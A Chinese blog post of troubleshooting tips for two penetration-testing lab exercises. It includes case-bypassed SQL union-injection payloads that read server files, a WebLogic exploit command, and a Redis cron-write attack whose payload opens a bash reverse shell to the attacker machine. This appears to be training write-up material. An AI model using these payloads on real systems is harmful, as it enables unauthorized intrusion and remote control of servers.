企业环境渗透1&2问题总结

最新推荐文章于 2024-07-14 18:35:17 发布
最新推荐文章于 2024-07-14 18:35:17 发布
阅读量489 收藏 1
点赞数
文章标签: linux 渗透测试 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44520769/article/details/116901489
版权

做实验时遇到的问题汇总,希望能帮助到大家👇
原文见:https://goen-kkk.github.io/

企业环境渗透1

任务二 sql注入

联合查询失败问题

可以大小写绕过

?id=-1 UniOn SeleCt 1,2,3,4,5,6,7,8,9,0

在这里插入图片描述

发现 1 和 3 为显示位 ,接下来就可以进行一系列操作啦

  • 确定当前使用的数据库

    ?id=-1 UniOn SeleCt 1,2,database(),4,5,6,7,8,9,0

在这里插入图片描述

  • 确定当前使用的用户

    ?id=-1 UniOn SeleCt 1,2,user(),4,5,6,7,8,9,0

    在这里插入图片描述

  • 读取 apache 的配置文件,得到网站根目录

    ?id=-1 UniOn SeleCt 1,2,load_file(“/etc/httpd/conf/httpd.conf”),4,5,6,7,8,9,0

    在这里插入图片描述

这里汇总了一下常见的 SQL 注入 pypass 方法,大家也可以试试其他方法
在这里插入图片描述


任务三

打开虚拟终端

我之前没明白教程上的终端图从哪来的

在这里插入图片描述

打开之后长这样

在这里插入图片描述

任务四

远程连接失败问题

远程登录时,出现以下报错

在这里插入图片描述

更改了 reGeorgSocksProxy.py 代理设置的端口,从 8080 更改为 8888,解决了远

程登录的问题。


企业环境渗透2

首先操作机应该是192.168.2.200,只有这台机器是kali Linux机,我登了半天,坑人。

任务一

.jar文件运行命令

java -jar WebLogic_EXP.jar


任务二

打开网页

漏洞信息网页可以在本机上打开,虚拟机无法访问

https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/


任务三

查找漏洞字段的方法

  1. 访问http://192.168.2.11/wp-admin页面,可以看到左上角有 Length 字样,需要测试 length 是哪个字段的长度
    在这里插入图片描述

  2. 使用Burpsuite的repeater模块探测漏洞字段。
    在这里插入图片描述

  3. 修改host字段,发现Host字段的长度即是响应中length的值,即漏洞字段为Host

在这里插入图片描述


任务五

上传avi文件

必须是以123.avi的文件名上传,才会有下载的文件,在/download出下载

修改porxychains.conf

路径:/etc/proxychains.conf

shell 弹不出来

按照网上教程的方法,一直弹不出1.11的shell,这里提供另一种方法:

  1. 按步骤得到456.avi

  2. 开启一个终端,打开任务四中的代理(reGeorgeSocksProxy)

  3. 打开另一个终端,监听端口5555:“nc -lvp 5555”

  4. 再打开另一个终端,输入指令“proxychains redis-cli -h 192.168.1.11”(最好新打开,不要用之前的)

  5. 输入命令:

    > set a "\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.2.200/5555 0>&1\n"
> ccoonnffiigg set dir /var/spool/cron
> ccoonnffiigg set dbfilename root
> save

  6. 在监听5555端口的终端得到反弹的shell

在这里插入图片描述

还有一个问题,shell维持的时间可能比较短,很拼手速,一个小tips:可以先打出命令,登弹出时,直接回车就行。

weixin_44520769
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全——企业渗透
HizT_1999的博客
06-24 1083
企业渗透2: 任务一、Weblogic反序列化 1.访问192.168.2.10:7001 2.使用weblogic工具 利用工具查看192.168.2.10根目录,发现在/home/flag目录下存在一个.txt文件,查看内容则为答案。 任务二、Wordpress 任意文件读取 1.使用wpscan工具(kali集成)扫描插件漏洞: 用–enumerate vp选项。 发现存在一个任意文件读取漏洞。点击终端中的提示网页,根据提示构造url: 可从显示的页面中得到flag的内容: 任务三、
网络安全——企业渗透
HizT_1999的博客
06-24 1056
企业渗透1: 任务一、后台文件上传 1.1使用目录扫描工具对目标网站的后台地址进行扫描(如wwwscan) 根据扫描结果可猜测管理员登录界面为/manager/login.php或/myadmin/。 尝试用root root弱口令登录/myadmin/,成功登录数据库。发现数据库"admin"中的密码如下图密文所示: 使用md5解密工具破解密码为"1q2w3e4r"。 用户名:admin 密码:1q2w3e4r 1.2使用爆破出的管理员密码登录后台 任务二、Sql注入 1.访问/sql目录,尝
企业生产环境渗透测试应该注意什么?
anan的博客
06-22 779
这个问题可以说是真的很傻缺,因为既然是做渗透测试而非黑客攻击,为什么非要在生产环境搞,一不小心把服务搞挂了谁能负责,真的太心大了,今天我被问到这个问题了,没办法,作为一名安全工程师需要给出自己的建议,将风险降到最低! 1.确定渗透测试的注意事项 2.扫描前一定要备份数据库、备份代码 3.禁止登陆扫描(否则你会哭死) 4.降低扫描线程(避免把服务扫死) 5.增删改一定要手工操作(扫描器会真的删你的数据) 6.禁止脱库 跑数据 传 shell(避免测试人员留后门或者后门清理不彻底) 7.如需测命令执行类漏洞需要
渗透环境搭建2
bmxch的博客
03-08 205
这里添加wins域名,是windows内置的协议,我们不需要依靠这个协议,我们只需要依赖域名就可以了。我们新建两个组织机构把他们分别放在不同的组织机构。我们现在可以在dc中看到这两台加入域的电脑了。选择完ad域和dns就无脑下一步就可以了。输入域控Administrator的密码。我们要让2008加入域需要条件。安装完我们提升此服务器为域控。2008的dns需要指向域控。域控和2008需要双向互通。把安装好的win7也加入域。我们升级域控一半都是新林。后面都是默认下一步了。我们用创建的账号登录。
企业环境渗透 - part1
weixin_49816179的博客
10-12 463
本实验学习到了获取 webshell 的多种方法,例如爆破管理员口令、直接上传木马、利用 SQL 注入向文件中写入一句话木马,或者通过数据库上传文件等多种攻击方式。这种多样性也表明了企业在加强安全意识的必要性,以防止网络攻击。本次实验旨在对网络安全攻防的认识更加深入,也提高了自身的安全意识和能力。
企业文化】某公司企业文化建设年度工作总结.doc
09-04
XX公司在过去的一年里,高度重视并积极推动企业文化建设,旨在塑造一个富有创新精神、团结协作的企业环境,以集团为导向,强化企业内部的凝聚力和向心力。工作总结主要围绕以下几个方面展开: 首先,公司坚持正确的...
记一次不完整的渗透1
08-08
记一次不完整的渗透测试 本文将详细介绍一次渗透测试的过程,从目标选择到最终的提权过程。...本文总结渗透测试的整个过程,包括目标选择、踩点、注入、提权等步骤,希望能够帮助读者更好地理解渗透测试的过程。
企业安全体系建设工作总结.docx
12-06
企业安全体系建设】 企业在安全体系建设过程中,首要任务是确保安全工作得到充分的部署...通过不断总结经验、反思教训、创新方法,企业成功构建了一套有效的安全管理体系,为其他企业提供了解决类似问题的宝贵经验。
企业文化在班级管理中的渗透.pdf
10-01
企业文化在班级管理中的渗透】 在当前职业教育领域,企业文化的融入已经成为提升技能型人才培养质量的关键。班级管理作为学校教育的核心环节,需要积极借鉴和引入企业文化,以帮助学生更好地适应未来工作环境,...
浅谈云上渗透测试方法.pdf
08-08
演讲者Mickey现就职于某大型国际网络公司,多年负责和云相关的业务,所以对云上的一系列安全问题有着自己的独特深刻见解,对可能对云服务产生威胁的人为和非人为因素有着自己的总结。这也许能让你测试如今以云为主的...
企业渗透测试和持续监控
06-30
【为什么学习这门课程?】 企业渗透测试和持续监控在线课程是白帽艺术系列视频的一部分,通过内部/外部侦察、社会工程、网络和漏洞扫描,逐步示范了对企业网络进行安全评估(渗透测试)的现实场景。您还将学习如何执行web应用程序测试、内部网络测试、权限升级、密码破解和数据泄露,以探测和减轻企业漏洞。本课程最后介绍了报告和评估方法,以确保您的企业环境在不断变化的威胁和安全漏洞面前保持安全。【本门课程亮点】 帮助您学习在企业网络环境中执行高级渗透测试所需的技能。课程包含循序渐进的指导,这样您就可以学习道德白帽、渗透测试和安全态势评估。您还将学习行业中许多不同的前沿安全技能相关的各种概念。课程包含真实场景的多媒体教程和实践演示,想要成为职业道德白帽或跟上不断演变的漏洞威胁的人,可以通过学习本课程了解企业网络安全的弱点。 【讲师介绍】  Omar Santos(奥马尔·桑托斯)—— 思科PSIRT首席工程师、作家Omar Santos(奥马尔·桑托斯)是思科产品安全事件响应团队(PSIRT)的首席工程师,指导和领导团队工程师和事件经理对安全漏洞进行调查和解决。桑托斯著有20多本网络安全方面的专著,在全球拥有大量读者,他制作的大量白皮书、文章、安全配置指南等相关内容被大量媒体引用,如《共和报》、《连线》、《ZDNet》、《网络独家新闻》、《TechCrunch》、《财富》、《Ars Technica》等等。同时,他还是网络安全社区的一名活跃成员,他参与很多重要行业的网络安全倡议和标准制定。他还会积极帮助企业、学术机构、州和地方执法机构,提高关键基础设施的安全性。【课程收获】 1、计划、建立和管理一个红客队伍来进行企业白帽活动 2、使用被动/主动侦察、社会工程、网络和漏洞扫描来探测企业漏洞3、确定目标主机、部署工具危害web应用程序4、学习如何渗透网络,扫描易受危害的目标和开源软件,如何通过夺旗以确定企业的弱点 5、使用经过验证的方法和工具升级网络访问权限 6、执行密码破解,破解网络和用户凭证,获取敏感数据,并掩盖过程踪迹 7、测试云服务的漏洞 8、对渗透测试事件进行报告,并建立一个持续的监控基础设施,以缓解正在进行的威胁 【面向人群】 1、所有开始从事职业白帽和渗透测试工作的网络安全专业人员 3、准备考取CompTIA PenTest+,道德白帽认证(CEH),危害安全专家认证(OSCP),以及其他道德白帽认证的人3、任何想要学习成为道德白帽所需技能的网络安全专业人员,或者想要学习更多关于一般安全渗透测试方法和概念的网络安全专业人员
渗透测试-环境(1)
清风冷吟
08-11 705
渗透测试-环境(1)代理实验环境linux虚拟机(ether pad)测试用虚拟机系统Ubuntu:Metasploitable2模拟真实网络M0n0wall防火墙背靠背防火墙基本工具使用NC/ncatWiresharkTcpdump过程文档记录Dradiskeepnotetruecrypt 渗透测试-环境(1) 代理 TOR GoAgent Gtk 实验环境 linux虚拟机(ether pad) http://www.turnkeylinux.org 测试用虚拟机系统Ubuntu: 下载Ubunt.
记一次对某企业渗透测试实战
dfdhxb995397的博客
06-25 1768
作者:Vulkey_Chen 前言 本文总结一下漫长的渗透测试过程,想尽了各种方法,终于找到了突破口。so没有绝对的安全,所谓的安全性其实都是相对的~ 信息踩点 在这里其实没办法去做一些有价值的收集,只能踩点,踩坑。 信息难点: 传输加密: 要做渗透的目标是一个APP,根据抓到的请求包发现这个APP是经过某产品加固过的,所以HTTP的POST请求正文部分(Data)是神奇的...
渗透测试学习笔记——BurpSuite的repeater模块
cecily044的博客
06-23 1932
简单介绍 Burp Repeater 是一个HTTP 发包模块,通常我们使用它来重放经过 Proxy的请求,可以更加方便的修改包内容以及进行测试。 使用Repeater发送请求 1.打开Burp Repeater模块,两侧文本框默认都是空的。 2.随便复制一个url(这里以https://www.baidu.com/为例),在Repeater左侧文本框右键并选择paste URL as request 这样就得到了一个发包模板 点击「Send」得到响应消息,这样我们就完成了一次简单的发包。 重放pr
burpsuite使用以及repeater模块实现重放攻击
weixin_30326741的博客
11-13 1391
第一、burp suit是什么? Burp Suite 包含了一系列burp 工具,这些工具之间有大量接口可以互相通信,之所以这样设计的目的是为了促进和提高 整个攻击的效率。平台中所有工具共享同一robust 框架,以便统一处理HTTP 请求,持久性,认证,上游代理,日志记录,报警和可扩展性。Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web 应用程序。这些不同的burp ...
BurpSuite系列(六)----Repeater模块(中继器)
热门推荐
fendo
01-29 2万+
一、简介 Burp Repeater 是一个手动修改并补发个别 HTTP 请求,并分析他们的响应的工具。它最大的用途就是和其他 Burp Suite 工具结合起来。你可以从目标站点地图,从 Burp Proxy 浏览记录,或者从 Burp Intruder 攻击结果上的请求,发送到 Repeater 上,并手动调整这个请求来微调对漏洞的探测或攻击。 二、模块说明
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 225
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
linux的学习(四):磁盘,进程,定时,软件包的相关命令
最新发布
weixin_45037073的博客
07-14 828
关于磁盘管理,进程管理,定时任务,软件包管理的命令的使用。
Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 1001
收藏向 使用解析

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值